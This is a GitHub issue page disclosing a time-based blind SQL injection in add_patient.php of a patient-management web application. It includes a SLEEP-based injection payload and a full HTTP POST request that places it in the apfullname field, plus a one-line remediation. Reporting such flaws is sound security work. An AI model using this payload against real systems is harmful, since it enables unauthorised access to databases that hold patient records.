Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
KhanhCM (@khanhchauminh)
Example payload:
' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a) AND 'a'='a
POST /add_patient.php HTTP/1.1 Host: 127.0.0.1:8888 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/add_patient.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fm1clgb18smbtthd68i37dsdrn Connection: close apfullname=test'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))a)%20AND%20'a'%3d'a&apAge=12&apweight=45&apphone_no=123&apaddress=test&apSpecialist=Audiologist&apCondition=test
Validate input of all vulnerable parameters in add_patient.php.
add_patient.php
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Author
KhanhCM (@khanhchauminh)
Version: 1.0
Vulnerable parameters
Steps to reproduce
Example payload:
Proof-of-concept
Response in Burpsuite
Source code review
add_patient.php
library.php
Remediation
Validate input of all vulnerable parameters in
add_patient.php.The text was updated successfully, but these errors were encountered: